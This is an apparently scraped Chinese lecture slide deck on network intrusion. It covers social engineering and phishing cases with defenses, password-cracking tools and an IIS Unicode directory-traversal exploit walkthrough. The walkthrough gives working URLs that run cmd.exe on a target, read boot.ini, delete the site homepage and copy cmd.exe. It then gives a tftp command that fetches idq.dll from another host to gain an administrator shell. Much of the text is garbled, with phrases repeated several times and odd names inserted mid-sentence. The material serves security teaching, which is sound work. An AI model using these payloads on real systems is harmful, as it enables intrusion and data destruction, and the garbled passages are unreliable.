《社会工程学攻击网络钓鱼防范课件.ppt》由会员分享,可在线阅读,更多相关《社会工程学攻击网络钓鱼防范课件.ppt(125页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、第第第第7 7 7 7讲网络入侵讲网络入侵讲网络入侵讲网络入侵2 2内容提要内容提要社会工程学攻击社会工程学攻击物理攻击物理攻击破解密码攻击破解密码攻击UnicodeUnicode漏洞攻击漏洞攻击缓冲区溢出漏洞攻击缓冲区溢出漏洞攻击拒绝服务攻击拒绝服务攻击winxpwinxp密码攻击实例密码攻击实例 3 32023/2/57 7.1 1 社会工程学攻击社会工程学攻击社会工程社会工程社会工程社会工程是使用计谋和假情报去获得密码和其他敏感信息的是使用计谋和假情报去获得密码和其他敏感信息的是使用计谋和假情报去获得密码和其他敏感信息的是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略
2、其中之一就是尽可能多的了解这科学,研究一个站点的策略其中之一就是尽可能多的了解这科学,研究一个站点的策略其中之一就是尽可能多的了解这科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他个组织的个体,因此黑客不断试图寻找更加精妙的方法从他个组织的个体,因此黑客不断试图寻找更加精妙的方法从他个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。们希望渗透的组织那里获得信息。们希望渗透的组织那里获得信息。们希望渗透的组织那里获得信息。攻击者通过讲述一些似是而非的假话,可以从有权访问的人攻击者通过讲述一些似是而非的假话,可
3、以从有权访问的人攻击者通过讲述一些似是而非的假话,可以从有权访问的人攻击者通过讲述一些似是而非的假话,可以从有权访问的人那里直接得到口令那里直接得到口令那里直接得到口令那里直接得到口令攻击者利用大众的疏于防范的小诡计,让受害者掉入陷阱,攻击者利用大众的疏于防范的小诡计,让受害者掉入陷阱,攻击者利用大众的疏于防范的小诡计,让受害者掉入陷阱,攻击者利用大众的疏于防范的小诡计,让受害者掉入陷阱,盗取身份识别。盗取身份识别。盗取身份识别。盗取身份识别。3 3 4 42023/2/5目前社会工程学攻击主要包括两种方式:目前社会工程学攻击主要包括两种方式:目前社会工程学攻击主要包括两种方式:目前社会工程学
4、攻击主要包括两种方式:n n打电话请求密码打电话请求密码打电话请求密码打电话请求密码 尽管不像前面讨论的策略那样聪明,打电话寻问密码也经尽管不像前面讨论的策略那样聪明,打电话寻问密码也经尽管不像前面讨论的策略那样聪明,打电话寻问密码也经尽管不像前面讨论的策略那样聪明,打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,常奏效。在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。经常通过这种简单的方法重新获得密码。经常通过这种简单的方法重新获得密码
5、。经常通过这种简单的方法重新获得密码。n n伪造伪造伪造伪造EmailEmail 使用使用使用使用telnettelnet黑客可以截取任何一个身份证发送黑客可以截取任何一个身份证发送黑客可以截取任何一个身份证发送黑客可以截取任何一个身份证发送EmailEmail的全部的全部的全部的全部信息,这样的信息,这样的信息,这样的信息,这样的EmailEmail消息是真的,因为它发自于一个合法消息是真的,因为它发自于一个合法消息是真的,因为它发自于一个合法消息是真的,因为它发自于一个合法的用户。在这种情形下这些信息是绝对的真实。黑客可以的用户。在这种情形下这些信息是绝对的真实。黑客可以的用户。在这种情形
6、下这些信息是绝对的真实。黑客可以的用户。在这种情形下这些信息是绝对的真实。黑客可以伪造这些。一个冒充系统管理员或经理的黑客能较为轻松伪造这些。一个冒充系统管理员或经理的黑客能较为轻松伪造这些。一个冒充系统管理员或经理的黑客能较为轻松伪造这些。一个冒充系统管理员或经理的黑客能较为轻松的获得大量的信息,从而实施他们的恶意阴谋。的获得大量的信息,从而实施他们的恶意阴谋。的获得大量的信息,从而实施他们的恶意阴谋。的获得大量的信息,从而实施他们的恶意阴谋。7.1 7.1 社会工程学攻击社会工程学攻击4 4社会工程学攻击例子社会工程学攻击例子 一组高中学生曾经想要入侵某公司的网络,他们拟定了一个表格,调查
7、看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子的名字。这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。5 51 1、请狼入室、请狼入室 李小姐是某大公司的经理秘书,她工作的电脑上存储着公李小姐是某大公司的经理秘书,她工作的电脑上存储着公司的许多重要业务资料,所以属于公司着重保护的对象,安全司的许多重要业务资料,所以属于公司着重保护的对象,安全部门设置了层层安全防护措施,可以说,她的电脑要从外部攻部门设置了层层安全防护措施,可以说,她的电脑要从外部攻破是根本不可能
8、的事情。为了方便修改设置和查杀病毒,安全破是根本不可能的事情。为了方便修改设置和查杀病毒,安全部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。也许贪图方便,维护员与李小姐的日常联系是通过也许贪图方便,维护员与李小姐的日常联系是通过QQQQ进行。进行。某天李小姐刚打开某天李小姐刚打开QQQQ,就收到维护员的消息:“小李,我小李,我忘记登录密码了,快告诉我,有个紧急的安全设置要做呢!忘记登录密码了,快告诉我,有个紧急的安全设置要做呢!”因为和维护员很熟了,李小姐就把密码发了过去。因为和维护员很熟了,李小姐就把密码发了过去。一夜一夜之间
9、,公司的主要竞争对手掌握了公司的业务!之间,公司的主要竞争对手掌握了公司的业务!6 6由于安全部门距离李小姐的工作地点有好些距离,管理不方便,所以公司让他们直接通过网络来管理机器!他与李小姐之间的联系通过QQ进行。问题偏偏就出在QQ上。作为安全人员,他自然知道密码的重要性,因此他的任何密码都设置得十分复杂,穷举几乎不可能。至于被入侵,那更不可能发生。然而百密仍有一疏百密仍有一疏,他做梦也没想到对手利用QQ的取回密码功能轻易拿到了他的密码。李小姐正是出于对维护员的信任才被对方欺骗的。因为那个在QQ上出现的维护员根本不是公司的维护员本人,而是对手盗取了维护员的QQ,再利用一个小小的信任关系,就轻易
10、取得了登录密码。2 2、形同虚设的密码、形同虚设的密码剖析:剖析:7 7 他在输入提示答案的时候,下意识地输入了心里最重要的那个人的名字。但是对手也知道他心里那个人的名字,所谓的“知己知彼知己知彼”绚丽的QQ秀和一些特色服务,但小马舍不得花钱。好想有免费的Q币。某天一QQ好友给他发来一个URL,还说这个网站通过一定的点击次数提供Q币。如此好的机会小马怎能放过?他根据网站的提示输入了QQ号码和密码完成注册,然后给QQ上的朋友们发了网址。然而等了许久,自己的Q币依然没有动静。第二天,小马想登录QQ时,却发现怎么也登录不上去了QQ密码被人改了。这是最近闹得轰轰烈烈的QQQQ欺骗案件欺骗案件之一。3
11、3、E E时代的守株待兔时代的守株待兔剖析:剖析:8 8大哥你是不是太搞笑?!改我密码还要5分钟啊?麻烦你快一点好不好!还有QQ中奖要求用户填写密码以待“验证”等伎俩,无论什么手法,最终结局都是一样的,那就是用户的密码被人改掉。如此白痴的骗局,只要有点常识的人都不难理解其中的“笑话”,奇怪的是却屡屡有人上当,究其原因,就是因为国人的贪小便宜心理作祟。这就是著名的“网络钓鱼”!论坛常有帖子:“腾讯公司预留了专用号码作为充值号,此号是自动读取指令的,为了不引起大家的注意,所以这个QQ比较普通,这个QQ一般隐身。只要发送Jerusalum/PLO号码Vesselin Bontchev密码FRALDM
12、UZK Q币数量,然后下线5分钟,等着收Q币吧。”剖析:剖析:9 9 王先生是一家银行的职员,通常都是直接在网络上完成转账操作的。由于他的电脑水平不高,前不久被一个初学者骇客入侵了机器。在请来专业人员修复系统更改密码后,王先生照例登录网络银行为手机缴费,可是才过一会儿他的冷汗就出来了:网络银行登录不进去了!深感大事不妙的王先生去银行办理了相关手续,查账发现账户里的钱已经被人划走了。因为王先生犯了大部分人都会犯的致命错误:通常为了记忆方便,人们因为王先生犯了大部分人都会犯的致命错误:通常为了记忆方便,人们会把会把几处的密码都设置成一样的,例如的,例如QQQQ、E-MAILE-MAIL、FTPFT
13、P、网站等的密码,、网站等的密码,而王先生更进一步把所有密码都弄成一样的了,因此入侵者在得到王先生的而王先生更进一步把所有密码都弄成一样的了,因此入侵者在得到王先生的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点,机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点,受害者往往都是被入侵者一锅端了!受害者往往都是被入侵者一锅端了!因为简单密码和相同密码是大部分人都会碰到的心理弱点 4 4、轻而易举的入侵、轻而易举的入侵1010 11112023/2/5例:网络钓鱼、勒索程序例:网络钓鱼、勒索程序例:网络钓鱼、勒索程序例:网络钓鱼、勒索程序网络钓鱼网络钓鱼网络钓鱼网
14、络钓鱼是近来社会工程学的代表应用是近来社会工程学的代表应用是近来社会工程学的代表应用是近来社会工程学的代表应用网络钓鱼方法:网络钓鱼方法:网络钓鱼方法:网络钓鱼方法:n n电子电子电子电子 邮件欺诈,冠以中奖、顾问、对账等内容邮件欺诈,冠以中奖、顾问、对账等内容邮件欺诈,冠以中奖、顾问、对账等内容邮件欺诈,冠以中奖、顾问、对账等内容n n建立假冒网上银行、网上证券网站,合法网页中插入恶意建立假冒网上银行、网上证券网站,合法网页中插入恶意建立假冒网上银行、网上证券网站,合法网页中插入恶意建立假冒网上银行、网上证券网站,合法网页中插入恶意htmlhtml代码等代码等代码等代码等n n利用虚假的电子
15、商务进行诈骗利用虚假的电子商务进行诈骗利用虚假的电子商务进行诈骗利用虚假的电子商务进行诈骗n n利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。n n利用用户弱口令等漏洞破解、猜测用户帐户和密码。利用用户弱口令等漏洞破解、猜测用户帐户和密码。利用用户弱口令等漏洞破解、猜测用户帐户和密码。利用用户弱口令等漏洞破解、猜测用户帐户和密码。7.1 7.1 社会工程学攻击社会工程学攻击1111 12122023/2/5网络钓鱼防范:网络钓鱼防范:
16、网络钓鱼防范:网络钓鱼防范:(1 1)针对电子)针对电子)针对电子)针对电子 邮件欺诈。邮件特征:问候语模仿被假冒单位口邮件欺诈。邮件特征:问候语模仿被假冒单位口邮件欺诈。邮件特征:问候语模仿被假冒单位口邮件欺诈。邮件特征:问候语模仿被假冒单位口吻,内容多传递紧迫的信息,索取个人信息,以超低价或海吻,内容多传递紧迫的信息,索取个人信息,以超低价或海吻,内容多传递紧迫的信息,索取个人信息,以超低价或海吻,内容多传递紧迫的信息,索取个人信息,以超低价或海关查没品等为诱饵关查没品等为诱饵关查没品等为诱饵关查没品等为诱饵(2 2)针对假冒网上银行、网上证券网站。核对网址;妥善选择)针对假冒网上银行、网
17、上证券网站。核对网址;妥善选择)针对假冒网上银行、网上证券网站。核对网址;妥善选择)针对假冒网上银行、网上证券网站。核对网址;妥善选择和保管密码;做好交易记录;管好数字证书;对异常动态提和保管密码;做好交易记录;管好数字证书;对异常动态提和保管密码;做好交易记录;管好数字证书;对异常动态提和保管密码;做好交易记录;管好数字证书;对异常动态提高警惕;不要通过搜索引擎链接登录支付网关高警惕;不要通过搜索引擎链接登录支付网关高警惕;不要通过搜索引擎链接登录支付网关高警惕;不要通过搜索引擎链接登录支付网关(3 3)针对虚假的电子商务信息。特征:交易方式单一,以不发)针对虚假的电子商务信息。特征:交易方
18、式单一,以不发)针对虚假的电子商务信息。特征:交易方式单一,以不发)针对虚假的电子商务信息。特征:交易方式单一,以不发货为由索要余款。货为由索要余款。货为由索要余款。货为由索要余款。(4 4)其他网络安全防范。安装和升级防火墙和防病毒软件;系)其他网络安全防范。安装和升级防火墙和防病毒软件;系)其他网络安全防范。安装和升级防火墙和防病毒软件;系)其他网络安全防范。安装和升级防火墙和防病毒软件;系统打补丁;不上不了解网站,不执行未经杀毒处理的下载软统打补丁;不上不了解网站,不执行未经杀毒处理的下载软统打补丁;不上不了解网站,不执行未经杀毒处理的下载软统打补丁;不上不了解网站,不执行未经杀毒处理的
19、下载软件;提高自我保护意识件;提高自我保护意识件;提高自我保护意识件;提高自我保护意识7.1 7.1 社会工程学攻击社会工程学攻击1212 13132023/2/57.1 7.1 社会工程学攻击社会工程学攻击1313 14142023/2/5物理安全是保护一些比较重要的设备不被接触。物理安全是保护一些比较重要的设备不被接触。物理安全是保护一些比较重要的设备不被接触。物理安全是保护一些比较重要的设备不被接触。物理安全比较难防,因为攻击往往来自能够接触到物理物理安全比较难防,因为攻击往往来自能够接触到物理物理安全比较难防,因为攻击往往来自能够接触到物理物理安全比较难防,因为攻击往往来自能够接触到物
20、理设备的用户。设备的用户。设备的用户。设备的用户。7.2 7.2 物理攻击与防范物理攻击与防范1414 15152023/2/5获取管理员密码获取管理员密码获取管理员密码获取管理员密码工具软件工具软件工具软件工具软件FindPass.exeFindPass.exen n登录后用户所有信息都存储在系统的进程登录后用户所有信息都存储在系统的进程登录后用户所有信息都存储在系统的进程登录后用户所有信息都存储在系统的进程winlogon.exewinlogon.exe中中中中7.2 7.2 物理攻击与防范物理攻击与防范1515 16162023/2/5获取管理员密码获取管理员密码获取管理员密码获取管理员
21、密码工具软件工具软件工具软件工具软件FindPass.exeFindPass.exen n将将将将FindPass.exeFindPass.exe拷贝到拷贝到拷贝到拷贝到C C根目录下,使用命令行执行根目录下,使用命令行执行根目录下,使用命令行执行根目录下,使用命令行执行7.2 7.2 物理攻击与防范物理攻击与防范1616 17172023/2/5提升管理员权限提升管理员权限提升管理员权限提升管理员权限工具软件工具软件工具软件工具软件GetAdmin.exeGetAdmin.exen n使用使用使用使用UsersUsers类型用户登陆类型用户登陆类型用户登陆类型用户登陆7.2 7.2 物理攻击
22、与防范物理攻击与防范1717 18182023/2/5提升管理员权限提升管理员权限提升管理员权限提升管理员权限工具软件工具软件工具软件工具软件GetAdmin.exeGetAdmin.exen n执行执行执行执行GetAdmin.exeGetAdmin.exe,主界面如下,主界面如下,主界面如下,主界面如下7.2 7.2 物理攻击与防范物理攻击与防范1818 19192023/2/5提升管理员权限提升管理员权限提升管理员权限提升管理员权限工具软件工具软件工具软件工具软件GetAdmin.exeGetAdmin.exe7.2 7.2 物理攻击与防范物理攻击与防范1919 20202023/2/5
23、提升管理员权限提升管理员权限提升管理员权限提升管理员权限工具软件工具软件工具软件工具软件GetAdmin.exeGetAdmin.exen n查看结果查看结果查看结果查看结果7.2 7.2 物理攻击与防范物理攻击与防范2020 21212023/2/5密码与用户账户的有效利用是网络安全性的最大问题之一。密码与用户账户的有效利用是网络安全性的最大问题之一。密码与用户账户的有效利用是网络安全性的最大问题之一。密码与用户账户的有效利用是网络安全性的最大问题之一。密码破解密码破解密码破解密码破解是描述在使用或不使用工具的情况下渗透网络、系是描述在使用或不使用工具的情况下渗透网络、系是描述在使用或不使用
24、工具的情况下渗透网络、系是描述在使用或不使用工具的情况下渗透网络、系统或资源以解锁用密码保护的资源的一个术语。统或资源以解锁用密码保护的资源的一个术语。统或资源以解锁用密码保护的资源的一个术语。统或资源以解锁用密码保护的资源的一个术语。密码破解不一定涉及复杂的工具。它可能与找一张写有密码密码破解不一定涉及复杂的工具。它可能与找一张写有密码密码破解不一定涉及复杂的工具。它可能与找一张写有密码密码破解不一定涉及复杂的工具。它可能与找一张写有密码的贴纸一样简单,而这张纸就贴在显示器上或者藏在键盘底的贴纸一样简单,而这张纸就贴在显示器上或者藏在键盘底的贴纸一样简单,而这张纸就贴在显示器上或者藏在键盘底
25、的贴纸一样简单,而这张纸就贴在显示器上或者藏在键盘底下。另一种暴力技术称为下。另一种暴力技术称为下。另一种暴力技术称为下。另一种暴力技术称为“垃圾搜寻垃圾搜寻垃圾搜寻垃圾搜寻”(Dumpster DivingDumpster Diving),),),),它基本上就是一个攻击者把垃圾搜寻一遍以找出可能含有密它基本上就是一个攻击者把垃圾搜寻一遍以找出可能含有密它基本上就是一个攻击者把垃圾搜寻一遍以找出可能含有密它基本上就是一个攻击者把垃圾搜寻一遍以找出可能含有密码的废弃文档。码的废弃文档。码的废弃文档。码的废弃文档。7.3 7.3 密码破解攻击密码破解攻击2121 22222023/2/5密码破解
26、的常见技术密码破解的常见技术密码破解的常见技术密码破解的常见技术n n字典攻击字典攻击字典攻击字典攻击n n混合攻击混合攻击混合攻击混合攻击n n暴力攻击暴力攻击暴力攻击暴力攻击7.3 7.3 密码破解攻击密码破解攻击2222 23232023/2/5密码破解的常见技术密码破解的常见技术密码破解的常见技术密码破解的常见技术n n字典攻击字典攻击字典攻击字典攻击 到目前为止,一个简单的字典攻击(到目前为止,一个简单的字典攻击(到目前为止,一个简单的字典攻击(到目前为止,一个简单的字典攻击(Dictionary AttackDictionary Attack)是)是)是)是闯入机器的最快方法。字典
27、文件(一个充满字典文字的文闯入机器的最快方法。字典文件(一个充满字典文字的文闯入机器的最快方法。字典文件(一个充满字典文字的文闯入机器的最快方法。字典文件(一个充满字典文字的文本文件)被装入破解应用程序(如本文件)被装入破解应用程序(如本文件)被装入破解应用程序(如本文件)被装入破解应用程序(如L0phtCrackL0phtCrack),它是根),它是根),它是根),它是根据由应用程序定位的用户账户运行的。因为大多数密码通据由应用程序定位的用户账户运行的。因为大多数密码通据由应用程序定位的用户账户运行的。因为大多数密码通据由应用程序定位的用户账户运行的。因为大多数密码通常是简单的,所以运行字典
28、攻击通常足以实现目的。常是简单的,所以运行字典攻击通常足以实现目的。常是简单的,所以运行字典攻击通常足以实现目的。常是简单的,所以运行字典攻击通常足以实现目的。n n混合攻击混合攻击混合攻击混合攻击n n暴力攻击暴力攻击暴力攻击暴力攻击7.3 7.3 密码破解攻击密码破解攻击2323 24242023/2/5密码破解的常见技术密码破解的常见技术密码破解的常见技术密码破解的常见技术n n字典攻击字典攻击字典攻击字典攻击 n n混合攻击混合攻击混合攻击混合攻击 混合攻击将数字和符号添加到文件名以成功破解密码。许混合攻击将数字和符号添加到文件名以成功破解密码。许混合攻击将数字和符号添加到文件名以成功
29、破解密码。许混合攻击将数字和符号添加到文件名以成功破解密码。许多人只通过在当前密码后加一个数字来更改密码。其模式多人只通过在当前密码后加一个数字来更改密码。其模式多人只通过在当前密码后加一个数字来更改密码。其模式多人只通过在当前密码后加一个数字来更改密码。其模式通常采用这一形式:第一月的密码是通常采用这一形式:第一月的密码是通常采用这一形式:第一月的密码是通常采用这一形式:第一月的密码是“cat”cat”;第二个月;第二个月;第二个月;第二个月的密码是的密码是的密码是的密码是“cat1”cat1”;第;第;第;第3 3个月的密码是个月的密码是个月的密码是个月的密码是“cat2”cat2”,依次
30、类,依次类,依次类,依次类推。推。推。推。n n暴力攻击暴力攻击暴力攻击暴力攻击7.3 7.3 密码破解攻击密码破解攻击2424 25252023/2/5密码破解的常见技术密码破解的常见技术密码破解的常见技术密码破解的常见技术n n字典攻击字典攻击字典攻击字典攻击 n n混合攻击混合攻击混合攻击混合攻击 n n暴力攻击暴力攻击暴力攻击暴力攻击 暴力攻击(暴力攻击(暴力攻击(暴力攻击(Brute Force AttackBrute Force Attack)是最全面的攻击形式,虽)是最全面的攻击形式,虽)是最全面的攻击形式,虽)是最全面的攻击形式,虽然它通常需要很长的时间工作,这取决于密码的复杂
31、程度。然它通常需要很长的时间工作,这取决于密码的复杂程度。然它通常需要很长的时间工作,这取决于密码的复杂程度。然它通常需要很长的时间工作,这取决于密码的复杂程度。根据密码的复杂程度,某些暴力攻击可能花费一个星期的根据密码的复杂程度,某些暴力攻击可能花费一个星期的根据密码的复杂程度,某些暴力攻击可能花费一个星期的根据密码的复杂程度,某些暴力攻击可能花费一个星期的时间。时间。时间。时间。7.3 7.3 密码破解攻击密码破解攻击2525 26262023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件GetNTUserGetNTUser7.3
32、7.3 密码破解攻击密码破解攻击2626 27272023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 主界面主界面主界面主界面7.3 7.3 密码破解攻击密码破解攻击2727 28282023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击2828 29292023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软
33、件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击2929 30302023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3030 31312023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3131 32322023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破
34、解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3232 33332023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3333 34342023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3434 35352023/2/5破解操作系统口
35、令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3535 36362023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3636 37372023/2/5破解操作系统口令破解操作系统口令破解操作系统口令破解操作系统口令工具软件工具软件工具软件工具软件L0phtCrackL0phtCrack 7.3 7.3 密码破解攻击密码破解攻击3737 3
36、8382023/2/5破解破解破解破解WordWord文档密码文档密码文档密码文档密码工具软件工具软件工具软件工具软件AOXPPRAOXPPR Advanced Office XP Password Recovery Advanced Office XP Password Recovery7.3 7.3 密码破解攻击密码破解攻击3838 39392023/2/5破解破解破解破解WordWord文档密码文档密码文档密码文档密码工具软件工具软件工具软件工具软件 Password Recovery For Microsoft Word Password Recovery For Microsoft
37、Word7.3 7.3 密码破解攻击密码破解攻击3939 40402023/2/5破解破解破解破解PPTPPT文档密码文档密码文档密码文档密码工具软件工具软件工具软件工具软件 Password Recovery For Microsoft Powerpoint Password Recovery For Microsoft Powerpoint7.3 7.3 密码破解攻击密码破解攻击4040 41412023/2/5破解破解破解破解ACCESSACCESS文档密码文档密码文档密码文档密码工具软件工具软件工具软件工具软件 Password Recovery For Microsoft ACCES
38、S Password Recovery For Microsoft ACCESS7.3 7.3 密码破解攻击密码破解攻击4141 42422023/2/5破解各种破解各种破解各种破解各种OfficeOffice文档密码文档密码文档密码文档密码工具软件工具软件工具软件工具软件 Password Recovery For Microsoft Office Password Recovery For Microsoft Office7.3 7.3 密码破解攻击密码破解攻击Office Password Remover424243437.7.4 4 UnicodeUnicode漏洞专题漏洞专题 通过打
39、操作系统的补丁程序,就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发现的,受影响的版本:1.Microsoft IIS 5.0+Microsoft Win2K系列版本2.Microsoft IIS 4.0+Windows NT 4.0消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展扩展UNICODEUNICODE字符取代字符取代/和和而而能利用能利用././目录遍历目录遍历的漏洞。4444UnicodeUnicode漏洞的检测方法漏洞的检测方法使用扫描
40、工具X-Scan来检测Unicode漏洞是否存在。目标主机IP为:172.18.25.109,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了,X-Scan设置。4545UnicodeUnicode漏洞的检测方法漏洞的检测方法将主机添加到目标地址,扫描结果如图。4646UnicodeUnicode漏洞的检测方法漏洞的检测方法只要是/scripts开头的漏洞都是Unicode漏洞。比如:/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir其其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录4747Unico
41、deUnicode漏洞的检测方法漏洞的检测方法scripts目录一般系统盘根目录下的Inetpub目录下4848UnicodeUnicode漏洞的检测方法漏洞的检测方法在Windows的目录中,可以使用“./”来访问上一级目录在浏览器中利用“scripts/././”可以访问到系统盘根目录,访问“scripts/././winnt/system32”就访问到系统的system32了,在system32目录下包含许多重要的系统文件,比如cmd、net命令,可以利用该文件新建用户,删除文件等操作。浏览器地址栏中禁用符号浏览器地址栏中禁用符号“././”,但是可以使用符号“/”的Unicode的编码
42、。比如“/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。4949UnicodeUnicode漏洞漏洞此漏洞从中文IIS4.0+SP6开始,此外还影响中文WIN2k+IIS5.0、中文WIN2k+IIS5.0+SP1,繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。
43、%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af5050利用漏洞读取系统盘目录利用漏洞读取系统盘目录 利用该漏洞读取出计算机上目录列表,比读取利用该漏洞读取出计算机上目录列表,比读取C C盘的目录:盘的目录:http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:5151利用漏洞读取系统盘目录利用漏洞读取系统盘目录利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。http:/172.18.25.109/scripts/.%c0%2f./wi
44、nnt/shttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.iniystem32/cmd.exe?/c+type+c:boot.ini5252利用漏洞删除主页利用漏洞删除主页利用Unicode可以方便的更改对方的主页,若对方网站的根路径在“C:Initpubwwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。使用的语句是:http:/172.18.25.109/scripts/.%c0%2f./w
45、innt/http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwroosystem32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asptdefault.asp5353利用漏洞删除主页利用漏洞删除主页5454拷贝文件拷贝文件将cmd.exe文件拷贝到scripts目录,并改名为c.exe:http:/172.18.25.109/scripts/.%c0%2f./winnt/systhttp:/172.18.25.109/scripts/.%c0%2f./w
46、innt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exem32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exee+c.exe5555查看查看C C盘的目录盘的目录以后使用cmd.exe命令就方便了,比如查看C盘的目录,使用的语句就可以简化为:http:/172.18.25.109/scripts/c.exe?/c+dir+c:http:/172.18.25.109/scripts/c.exe?/c+dir+c:5656利用漏洞入侵系统利用漏洞入侵系统 在地址栏上执行命令,用户的权限比较低,像net等系统管
47、理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,它一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序。5757利用漏洞入侵系统利用漏洞入侵系统5858利用漏洞入侵系统利用漏洞入侵系统在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递i
48、dq.dll文件。在浏览器中执行命令:“http:/172.18.25.109/scripts/.%c0%2f./winnt/system3http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll2/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”,命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件5959上载文件并查看成果上载
49、文件并查看成果 6060入侵对方主机入侵对方主机 拷贝ispc.exe到本地计算机的C:,在命令行下执行:“ispc.exe 172.18.25.109/scripts/idq.dllispc.exe 172.18.25.109/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限。6161建立用户建立用户 可以在对方计算机上做管理员可以做的一切事情,比如添加用户。建立用户名:Hacker123,密码:Hacker1236262利用打印漏洞攻击利用打印漏洞攻击 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户(用户名与密码均为:hax)。
50、经过测试,该漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保证100%入侵成功。工具:cniis.exe,格式是:cniis 172.18.25.109 0参数参数1 1:是目标的IP地址,参数参数2 2:目标系统的补丁号因为172.18.25.109没有打补丁,这里就是0。6363SMBSMB致命攻击致命攻击SMB(Session Message Block,会话消息块协议会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种,在Windows 98、Wi